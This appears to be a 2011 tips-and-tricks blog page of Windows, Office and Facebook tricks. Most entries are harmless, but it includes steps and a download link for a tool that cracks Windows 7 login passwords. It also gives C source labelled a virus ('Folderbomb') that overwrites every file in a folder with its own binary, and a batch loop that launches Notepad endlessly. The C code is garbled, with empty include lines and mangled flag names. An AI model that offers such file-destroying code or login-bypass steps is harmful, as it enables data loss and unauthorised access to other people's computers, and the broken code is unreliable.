Web Toolbar by Wibiya

Pages

PLEASE,CLICK HERE TO SUPPORT US!! (ChetaN)

Tuesday, 27 December 2011

* Remove Windows 7 password with Windows Password Breaker.

Windows Password Breaker is a popular Windows 7 password reset tool. You can use it to create a bootable password reset CD/DVD or USB flash driver to reset forgotten Windows 7 administrator and other user password. It can reset password with 100% rate and no damage to your computer data and settings. 4 steps to crack Windows 7 password:
Step 1: Download and install Windows Password Breaker Professional.
Step 2: Burn a bootable password reset CD/DVD or USB flash drive with the program.
Step 3: Boot your locked computer from the burned CD/DVD/USB.
Step 4: Remove Windows 7 password.
Download link : 
http://www.recoverwindowspassword.com/downloads/windows_password_breaker_professional_trial.exe

* Disable Error Report In Windows

Microsoft’s Error Reporting in windows sometimes is disturbing, most of us don’t want to send 
that error report because it’s of no use.
There’s an easy way to disable Microsoft error report in windows.
Disable Microsoft Error report in Windows XP :
1) Open Control Panel (Start > Control Panel)
2) Open the Problem Reports & Solutions applet Under advanced options and disable error 
reporting.
Disable Microsoft Error report in Windows Vista :
1) Right click on my computer (Desktop) and click properties
2) Click the Advanced Tab
3) You’ll see a “Error reporting” button at the bottom, click it
4) Select Disable Error Reporting.
And you’re done….!

* ‎4 Worms that are being used to Hack Facebook Accounts.

Facebook currently has 4 worm Attacks. These attacks can lead to loss of your personal information or in worse cases can get your Facebook Account Hacked.

Worm 1 :- If you get a notice of a PHOTO TAG . Do not open it.
Worm 2 :- If you get a notification that a friend reported you for offensive behavior etc Do not open it.
Worm 3 :- Is a Video saying 99% of People can not watch this for more the 15 Sec. Do not open it.
Worm 4 :- All Messages from your friends via chat saying click this link .. Do not open.

All these worms are made to take your personal information and even to hack your accounts. The only way to protect yourself from these is to ignore them and not to click on them.

* Post Empty Status on Facebook

Login to your Facebook Account and go to Update Status field.
Press and hold Alt key and just type 0173.
Release Alt Key and click on share Post.
That’s all now your empty status will be update.

* How to Create a Desktop Shortcut to Safely Remove Hardware Device

Right click on your Desktop and Click on New.
Now choose Shortcut option from the list.
In the browse location just Copy/Paste the following text
"RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll" (without quotes).

* Toggle your Caps Lock button continuously

What this trick does is, when you run the following script it starts blinking caps Lock light continuously. If you run this script twice the rate of blink increases and alternatively NumLock light start to blink with CapsLock.
Open Notepad and Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Caps.VBS”

* This is a simple program to create a virus in C


/*Run this on your own responsibility.......
It will create Folder in a Folder in a Folder and so on ......*/
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

* Microsoft Word - Magic Trick

Write in Word this : "=rand(200,99)" (without the quotes) and witness the magic.
 Open Microsoft Word and on the first line write : 
"=rand(200,99)" (without the quotes) 
and hit Enter key. 
See the magic.

* Funny Notepad Trick.

A text file made with Notepad, with the following content : 
"Bush hid the facts" (without quotes) won't display the actual text. 
Open Ur Notepad :
Write in Notepad the following text :
"Bush hid the facts" (without quotes) then Save the file and exit Notepad. 
Now go to the text file you created and open it. 
U will see that the text you just wrote and save won't show.

* Increase virtual RAM on XP


Right click on MyComputer

Desktop>Goto Properties>
Advanced>Performnce>Setings>Advance>
VirtualMemory>Change>maximum...... thats it.

* Notepad Trick to Open notepad continuously.


1) Open Notepad. Type the following code.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
2) Save it as “notepad.BAT”